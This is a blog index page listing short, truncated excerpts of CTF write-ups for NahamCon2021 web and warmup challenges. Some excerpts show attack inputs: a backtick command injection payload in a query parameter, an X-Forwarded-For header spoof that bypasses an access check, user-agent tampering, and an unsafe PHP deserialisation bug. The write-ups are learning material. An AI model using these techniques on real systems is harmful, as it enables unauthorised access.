NahamCon2021 CTF - AgentTester

category web - medium solution We’re given an archive to download, agenttester.zip. This contained a Dockerfile and a python web application. The files in the archive had many secrets redacted which were set using environment variables. One specifically interesting one was CHALLENGE_FLAG, which we could assume was the target value to leak. The challenge URL dropped us on a page where we need to login. So, create an account, login and land on the home page of the agent tester....

March 15, 2021 · 2 min · Leon Jacobs

NahamCon2021 CTF - Bad Blog

category web - medium solution The challenge URL drops us on a page where we need to login. So, create an account, login and land on the home page of a blog. After creating a new post, you can see who visited your blog in the profile section. Poking around will reveal that if you tamper with your user agent string, that is what will show up in the analytics section....

March 15, 2021 · 1 min · Leon Jacobs

NahamCon2021 CTF - Cereal and Milk

category web - medium solution The challenge URL drops us on a page where we can submit cereals. We are also given two files to download, index.php & log.php. I quickly spotted an unsafe deserialisation bug in the provided files. The cleaned up and relevant PHP code from both files were: index.php <?php include 'log.php'; class CerealAndMilk { public $logs = "request-logs.txt"; public $request = ''; public $cereal = 'Captain Crunch'; public $milk = ''; public function processed_data($output) { echo "Deserilized data:<br> Coming soon....

March 15, 2021 · 2 min · Leon Jacobs

NahamCon2021 CTF - Imposter

category web - medium solution This was a tricker, but fun one. The challenge URL drops us on a login page with an OTP field. Signing up for an account responsed with a JSON structure containing a url key with an otpauth URI. Request POST /signup HTTP/1.1 Host: challenge.nahamcon.com:30809 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://challenge....

March 15, 2021 · 2 min · Leon Jacobs

NahamCon2021 CTF - Echo

category warmups - easy solution The challenge URL had a web based echo service. Many special characters, except for < and ` were filtered. It took me a while but I found the param had command injection. For example: GET /?echo=`id` HTTP/1.1 Host: challenge.nahamcon.com:30074 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://challenge.nahamcon.com:30074/?echo=food Cookie: auth2=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E; auth=eyJpZCI6MX0....

March 15, 2021 · 1 min · Leon Jacobs

NahamCon2021 CTF - Homeward Bound

category web - easy solution The challenge URL returns the message Sorry, this page is not accessible externally. Add the X-Forwarded-For: 127.0.0.1 header to reveal the flag. GET / HTTP/1.1 Host: challenge.nahamcon.com:30903 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close X-Forwarded-For: 127.0.0.1 Cookie: auth2=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E; auth=eyJpZCI6MX0.YEp7Wg.fHdsxIGEolHgYQD0d_cvExass8E Upgrade-Insecure-Requests: 1 The response has the flag. <p class="card-text"> <div class="alert alert-success" role="alert"> <b>Welcome!...

March 15, 2021 · 1 min · Leon Jacobs

NahamCon2021 CTF - Esab64

category warmups - easy solution The downloaded file contained a string, which looked like it was base64 encoded. The challenge title was also base64 reversed, esab64. ❯ cat esab64 mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X To solve, reverse the string, base64 decode and then reverse it again. import base64 with open("esab64", "r") as f: s = f.readline() s = s[::-1] d = base64.b64decode(s) print(d[::-1][:-1]) Running it gives us the flag. $ python3 solve.py b'flag{fb5211b498afe87b1bd0db601117e16e}'

March 15, 2021 · 1 min · Leon Jacobs

NahamCon2021 CTF - Pollex

category warmups - easy solution The downloaded file you get is an image, when opened looks like this: Output of exiftool shows that there is a thumbnail, with a hint to extract it right at the bottom. ❯ exiftool pollex.jpg ExifTool Version Number : 12.16 File Name : pollex.jpg Directory : . File Size : 37 KiB File Modification Date/Time : 2021:03:13 13:40:45+02:00 File Access Date/Time : 2021:03:15 09:53:11+02:00 File Inode Change Date/Time : 2021:03:15 09:53:11+02:00 File Permissions : rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1....

March 15, 2021 · 2 min · Leon Jacobs